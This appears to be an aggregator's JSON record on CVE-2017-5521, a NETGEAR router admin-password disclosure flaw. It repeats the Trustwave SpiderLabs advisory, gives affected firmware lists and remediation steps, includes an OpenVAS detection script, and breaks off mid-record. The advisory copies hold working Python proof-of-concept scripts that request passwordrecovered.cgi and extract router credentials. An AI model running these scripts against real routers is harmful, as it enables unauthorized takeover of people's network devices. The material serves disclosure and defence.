V1.0.0.22_1.0.29\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500 V1.0.1.6_1.0.24 \r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.50_1.0.30\r\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\r\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\r\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\r\n# WNR3500Lv2 V1.2.0.32_40.0.74\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n \r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n \r\n \r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequest to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n \r\nNetgear routers have an option to restore forgotten password via 2 security \r\nquestions. If the recovery option is disabled (which is the default), it is\r\nstill possible to recover the password by sending a correct token to the \r\nrecovery page. \r\n \r\nIf a user supplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not\r\nenabled), they will receive the admin password for the router. If password \r\nrecovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is\r\npersistent, even after disabling the recovery option, the exploit will fail, \r\nbecause the router will ask for the security questions.\r\n \r\nThis mechanism does not work correctly on the very first request to \r\n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \r\nany TOKEN value will result in disclosure of the password.\r\nThe issue occurs after every reboot of the router.\r\n \r\nThis can easily be reproduced using the attached poc, or by sending a simple \r\nrequest via the browser:\r\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\r\n \r\n## netgore2.py\r\nimport sys\r\nimport requests\r\n \r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n r = requests.get(url)\r\nexcept:\r\n url = 'https://' + ip + ':' + port + '/'\r\n r = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n print \"Attcking: \" + model[13:-1]\r\nelse:\r\n print \"not a netgear router\"\r\n sys.exit(0)\r\n#2nd stage\r\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\r\ntry:\r\n r = requests.post(url, verify=False)\r\nexcept:\r\n print \"not vulnerable router\"\r\n sys.exit(0)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n username = scrape(username, '>', '\\'')\r\n password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n password = scrape(password, '>', '\\'')\r\n if username == \"i_dont_speak_english\":\r\n username = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n password = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n print \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\r\n sys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n \r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n \r\n \r\n \r\n \r\nRemediation Steps:\r\nPlease see NETGEAR's KBA for list of firmware patches for various models. As a \r\nworkaround, the bug only works when password recovery is NOT set. If you do set\r\npassword recovery this is not exploitable.\r\n \r\nRevision History:\r\n04/06/2016 - Vulnerability disclosed to vendor\r\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\r\n05/18/2016 - Request for update; no response\r\n07/14/2016 - Request for update\r\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\r\n10/17/2016 - Request for update\r\n12/15/2016 - Notice of intent to publish advisories\r\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\r\n01/30/2017 - Advisory published\r\n \r\n \r\nReferences\r\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\r\n2. https://www.exploit-db.com/exploits/32883/\r\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\r\n \r\n \r\nAbout Trustwave:\r\nTrustwave is the leading provider of on-demand and subscription-based\r\ninformation security and payment card industry compliance management\r\nsolutions to businesses and government entities throughout the world. For\r\norganizations faced with today's challenging data security and compliance\r\nenvironment, Trustwave provides a unique approach with comprehensive\r\nsolutions that include its flagship TrustKeeper compliance management\r\nsoftware and other proprietary security solutions. Trustwave has helped\r\nthousands of organizations--ranging from Fortune 500 businesses and large\r\nfinancial institutions to small and medium-sized retailers--manage\r\ncompliance and secure their network infrastructure, data communications and\r\ncritical information assets. Trustwave is headquartered in Chicago with\r\noffices throughout North America, South America, Europe, Africa, China and\r\nAustralia. For more information, visit https://www.trustwave.com\r\n \r\nAbout Trustwave SpiderLabs:\r\nSpiderLabs(R) is the advanced security team at Trustwave focused on\r\napplication security, incident response, penetration testing, physical\r\nsecurity and security research. The team has performed over a thousand\r\nincident investigations, thousands of penetration tests and hundreds of\r\napplication security tests globally. In addition, the SpiderLabs Research\r\nteam provides intelligence through bleeding-edge research and proof of\r\nconcept tool development to enhance Trustwave's products and services.\r\nhttps://www.trustwave.com/spiderlabs\r\n \r\nDisclaimer:\r\nThe information provided in this advisory is provided \"as is\" without\r\nwarranty of any kind. Trustwave disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a\r\nparticular purpose. In no event shall Trustwave or its suppliers be liable\r\nfor any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/26837", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2020-05-11T21:01:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5521"], "description": "Multiple NETGEAR devices are prone to a admin password disclosure\n vulnerability", "modified": "2020-05-07T00:00:00", "published": "2017-01-23T00:00:00", "id": "OPENVAS:1361412562310106536", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106536", "type": "openvas", "title": "NETGEAR Devices Password Disclosure Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NETGEAR Devices Password Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106536\");\n script_version(\"2020-05-07T07:15:05+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 07:15:05 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-01-23 12:10:26 +0700 (Mon, 23 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-5521\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_name(\"NETGEAR Devices Password Disclosure Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8443);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"Multiple NETGEAR devices are prone to a admin password disclosure\n vulnerability\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to recover the admin password.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300,\n R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password\n disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the\n remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When\n trying to access the web panel, a user is asked to authenticate. If the authentication is canceled and password\n recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user\n supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled),\n they will receive the admin password for the router.\n\n If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were\n previously set when enabling that feature. This is persistent (even after disabling the recovery option, the\n exploit will fail) because the router will ask for the security questions.\");\n\n script_tag(name:\"affected\", value:\"NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3,\n WNR3500Lv2, R6250, R6700, R6900 and R8000 devices\");\n\n script_tag(name:\"solution\", value:\"As a mitigation manually enable the password recovery feature on your\n device and ensure that remote management is disabled.\");\n\n script_xref(name:\"URL\", value:\"http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default: 8443);\n\nres = http_get_cache(port: port, item: \"/\");\n\nif ('Basic realm=\"NETGEAR' >!< res)\n exit(0);\n\ntoken = eregmatch(pattern: \"unauth.cgi\\?id=([0-9]+)\", string: res);\nif (isnull(token[1]))\n exit(0);\n\ntoken = token[1];\n\nif (http_vuln_check(port: port, url: \"/passwordrecovered.cgi?id=\" + token,\n pattern: \"You can now log into the router using username .* and this recovered password\",\n extra_check: \"Router Admin Password\")) {\n report = http_report_vuln_url(port: port, url: \"/passwordrecovered.cgi?id=\" + token);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nNETGEAR Routers - Password Disclosure", "edition": 1, "published": "2017-01-30T00:00:00", "title": "NETGEAR Routers - Password Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-30T00:00:00", "id": "EXPLOITPACK:640BC8CE4CE32D930C91A9B475F51D37", "href": "", "sourceData": "Trustwave SpiderLabs Security Advisory TWSL2017-003:\nMultiple Vulnerabilities in NETGEAR Routers\n\nPublished: 01/30/2017 \nVersion: 1.0\n\nVendor: NETGEAR (http://www.netgear.com/)\nProduct: Multiple products\n\nFinding 1: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n\nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\n# D6400 V1.0.0.34_1.3.34\n# D6400 V1.0.0.38_1.1.38\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\n# R6300\tV1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.30_10.0.73\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.26_1.0.41\n# R8500 V1.0.0.56_1.0.28\n# R8500 V1.0.0.20_1.0.11\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.29_1.0.29\n# VEGN2610 V1.0.0.27_1.0.27\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.42_1.0.25\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\n# WN3100RP V1.0.0.6_1.0.12\n\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n\n\nProduct description:\nMultiple Netgear Routers\n\nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN.\n\nWhen trying to access the web panel a user is asked to authenticate, if the \nauthentication is cancelled and password recovery is not enabled, the user is \nredirected to a page which exposes a password recovery token. If a user \nsupplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. \n\nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \nquestions which were previously set when enabling the feature, this is \npersistent, even after disabling the recovery option the exploit will fail, \nbecause the router will ask for the security questions.\nThis can easily be reproduced using the attached poc, or by sending these two \nsimple requests via the browser:\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\n\n## netgore.py\nimport sys\nimport requests\n\n\ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage - get token\nip = sys.argv[1]\nport = sys.argv[2]\nurl = 'http://' + ip + ':' + port + '/'\ntry:\n\tr = requests.get(url)\nexcept:\n\turl = 'https://' + ip + ':' + port + '/'\n\tr = requests.get(url, verify=False)\nmodel = r.headers.get('WWW-Authenticate')\nif model is not None:\n\tprint \"Attcking: \" + model[13:-1]\nelse:\n\tprint \"not a netgear router\"\n\tsys.exit(0)\ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"')\nif token == 'i_dont_speak_english':\n\tprint \"not vulnerable\"\n\tsys.exit(0)\nprint \"token found: \" + token\n#2nd stage - pass the token - get the password\nurl = url + 'passwordrecovered.cgi?id=' + token\nr = requests.post(url, verify=False)\n#profit\nif r.text.find('left\\\">') != -1:\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\n\tusername = scrape(username, '>', '\\'')\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\n\tpassword = scrape(password, '>', '\\'')\n\tif username == \"i_dont_speak_english\":\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\nelse:\n\tprint \"not vulnerable becuse password recovery IS set\"\n\tsys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"#\",\"#\")\npassword = password.replace(\"&\",\"&\")\nprint \"user: \" + username\nprint \"pass: \" + password\n\n================================\nJust run the PoC against a router to get the credentials if it is vulnerable.\n\n\n\nFinding 2: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n\nVersion affected: \n\n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6300 V1.0.0.96_1.1.96 (Latest)\n# D6300B V1.0.0.36_1.0.36\n# D6300B V1.0.0.32_1.0.32\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\n# DGN2200v4 V1.0.0.66_1.0.66\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.56_1.0.43 (Latest)\n# R6200 V1.0.1.52_1.0.41\n# R6200 V1.0.1.48_1.0.37\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\n# R6200v2 V1.0.1.20_1.0.18\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\n# R6250 V1.0.1.84_1.0.78 \n# R6300\tV1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\n# R6700 V1.0.0.26_10.0.26 (Latest)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R7000 V1.0.4.30_1.1.67\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\n# R7900 V1.0.0.10_10.0.7\n# R7900 V1.0.0.8_10.0.5\n# R7900 V1.0.0.6_10.0.4\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.30_1.0.43\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.27_1.0.27\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\n# VEVG2660 V1.0.0.23_1.0.23\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\n# WNDR3400v3 V1.0.1.2_1.0.51\n# WNDR3400v3 V1.0.0.22_1.0.29\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.50_1.0.30\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\n# WNR3500Lv2 V1.2.0.32_40.0.74\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n\n\nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN.\n\nNetgear routers have an option to restore forgotten password via 2 security \nquestions. If the recovery option is disabled (which is the default), it is \nstill possible to recover the password by sending a correct token to the \nrecovery page. \n\nIf a user supplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. If password \nrecovery is set the exploit will fail, as it will ask the user for the recovery \nquestions which were previously set when enabling the feature, this is \npersistent, even after disabling the recovery option, the exploit will fail, \nbecause the router will ask for the security questions.\n\nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \nany TOKEN value will result in disclosure of the password.\nThe issue occurs after every reboot of the router.\n\nThis can easily be reproduced using the attached poc, or by sending a simple \nrequest via the browser:\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\n\n## netgore2.py\nimport sys\nimport requests\n\ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage\nip = sys.argv[1]\nport = sys.argv[2]\nurl = 'http://' + ip + ':' + port + '/'\ntry:\n\tr = requests.get(url)\nexcept:\n\turl = 'https://' + ip + ':' + port + '/'\n\tr = requests.get(url, verify=False)\nmodel = r.headers.get('WWW-Authenticate')\nif model is not None:\n\tprint \"Attcking: \" + model[13:-1]\nelse:\n\tprint \"not a netgear router\"\n\tsys.exit(0)\n#2nd stage\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\ntry:\n\tr = requests.post(url, verify=False)\nexcept:\n\tprint \"not vulnerable router\"\n\tsys.exit(0)\n#profit\nif r.text.find('left\\\">') != -1:\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\n\tusername = scrape(username, '>', '\\'')\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\n\tpassword = scrape(password, '>', '\\'')\n\tif username == \"i_dont_speak_english\":\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\nelse:\n\tprint \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\n\tsys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"#\",\"#\")\npassword = password.replace(\"&\",\"&\")\nprint \"user: \" + username\nprint \"pass: \" + password\n\n================================\nJust run the PoC against a router to get the credentials if it is vulnerable.\n\n\n\n\nRemediation Steps:\nPlease see NETGEAR's KBA for list of firmware patches for various models. As a \nworkaround, the bug only works when password recovery is NOT set. If you do set \npassword recovery this is not exploitable.\n\nRevision History:\n04/06/2016 - Vulnerability disclosed to vendor\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\n05/18/2016 - Request for update; no response\n07/14/2016 - Request for update\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\n10/17/2016 - Request for update\n12/15/2016 - Notice of intent to publish advisories\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\n01/30/2017 - Advisory published\n\n\nReferences\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\n2. https://www.exploit-db.com/exploits/32883/\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today's challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave's products and services.\nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply.", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2017-01-31T10:59:41", "description": "Multiple Netgear Routers - Password Disclosure. CVE-2017-5521. Webapps exploit for Hardware platform", "published": "2017-01-30T00:00:00", "type": "exploitdb", "title": "Multiple Netgear Routers - Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-30T00:00:00", "id": "EDB-ID:41205", "href": "https://www.exploit-db.com/exploits/41205/", "sourceData": "Trustwave SpiderLabs Security Advisory TWSL2017-003:\r\nMultiple Vulnerabilities in NETGEAR Routers\r\n\r\nPublished: 01/30/2017 \r\nVersion: 1.0\r\n\r\nVendor: NETGEAR (http://www.netgear.com/)\r\nProduct: Multiple products\r\n\r\nFinding 1: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n\r\nVersion affected: \r\n \r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\r\n# D6400 V1.0.0.34_1.3.34\r\n# D6400 V1.0.0.38_1.1.38\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\r\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\r\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\r\n# R6300\tV1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.30_10.0.73\r\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\r\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.26_1.0.41\r\n# R8500 V1.0.0.56_1.0.28\r\n# R8500 V1.0.0.20_1.0.11\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.29_1.0.29\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\r\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# 